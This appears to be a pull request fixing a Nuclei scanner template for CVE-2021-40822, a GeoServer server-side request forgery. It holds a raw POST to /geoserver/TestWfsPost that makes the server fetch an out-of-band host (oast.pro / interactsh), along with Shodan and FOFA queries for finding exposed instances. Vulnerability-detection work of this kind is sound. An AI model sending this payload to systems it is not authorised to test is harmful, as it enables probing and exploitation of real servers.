### PR TITLE
Fixed 2021-40822

### DIFF
--- a/http/cves/2021/CVE-2021-40822.yaml
+++ b/http/cves/2021/CVE-2021-40822.yaml
@@ -2,7 +2,7 @@ id: CVE-2021-40822
 
 info:
   name: Geoserver - Server-Side Request Forgery
-  author: For3stCo1d
+  author: For3stCo1d, aringo-bf
   severity: high
   description: GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows server-side request forgery via the option for setting a proxy host.
   reference:

--- a/http/cves/2021/CVE-2021-40822.yaml
+++ b/http/cves/2021/CVE-2021-40822.yaml
@@ -19,15 +19,16 @@ info:
     epss-score: 0.65495
   metadata:
     max-request: 1
-    fofa-query: app="GeoServer"
     verified: true
+    shodan-query: title:"GeoServer"
+    fofa-query: app="GeoServer"
   tags: cve,cve2021,ssrf,geoserver
 
 http:
   - raw:
       - |
         POST /geoserver/TestWfsPost HTTP/1.1
-        Host: oast.pro
+        Host: {{oast.pro}}
         Content-Type: application/x-www-form-urlencoded
 
         form_hf_0=&url=http://oast.pro/geoserver/../&body=&username=&password=
@@ -37,7 +38,7 @@ http:
       - type: word
         part: body
         words:
-          - "Interactsh Server"
+          - "<b>Interactsh</b>"
 
       - type: word
         part: header

--- a/http/cves/2021/CVE-2021-40822.yaml
+++ b/http/cves/2021/CVE-2021-40822.yaml
@@ -2,7 +2,7 @@ id: CVE-2021-40822
 
 info:
   name: Geoserver - Server-Side Request Forgery
-  author: For3stCo1d, aringo-bf
+  author: For3stCo1d,aringo-bf
   severity: high
   description: GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows server-side request forgery via the option for setting a proxy host.
   reference:
@@ -27,21 +27,22 @@ http:
   - raw:
       - |
         POST /geoserver/TestWfsPost HTTP/1.1
-        Host: {{interactsh-url}}
+        Host: oast.pro
         Content-Type: application/x-www-form-urlencoded
 
-        form_hf_0=&url=http://{{interactsh-url}}/geoserver/../&body=&username=&password=
+        form_hf_0=&url=http://oast.pro/geoserver/../&body=&username=&password=
 
     matchers-condition: and
     matchers:
       - type: word
-        part: interactsh_protocol # Confirms the HTTP Interaction
+        part: body
         words:
-          - "http"
+          - "Interactsh Server"
 
       - type: word
+        part: header
         words:
-          - "<html><head></head><body>"
+          - "text/html"
 
       - type: status
         status:

--- a/http/cves/2021/CVE-2021-40822.yaml
+++ b/http/cves/2021/CVE-2021-40822.yaml
@@ -27,7 +27,7 @@ http:
   - raw:
       - |
         POST /geoserver/TestWfsPost HTTP/1.1
-        Host: {{Hostname}}
+        Host: {{interactsh-url}}
         Content-Type: application/x-www-form-urlencoded
 
         form_hf_0=&url=http://{{interactsh-url}}/geoserver/../&body=&username=&password=


### PR DESCRIPTION
### Template / PR Information

The original template never functioned. 

Looking at the research in the reference the author states HOST header must equal the domain for the SSRF. So if interact in the URL it should be interact in the HOST.  

- Fixed 2021-40822
- References:
https://gccybermonks.com/posts/cve-2021-40822/

### Template Validation
The author of the research provided a vulnerable environment where you can see the original template did not function and this template should. 

Clone the repository and start lab
Repository - https://github.com/phor3nsic/CVE-2021-40822
Start lab: docker-compose up

I've validated this template locally?
- [X] YES
- [ ] NO


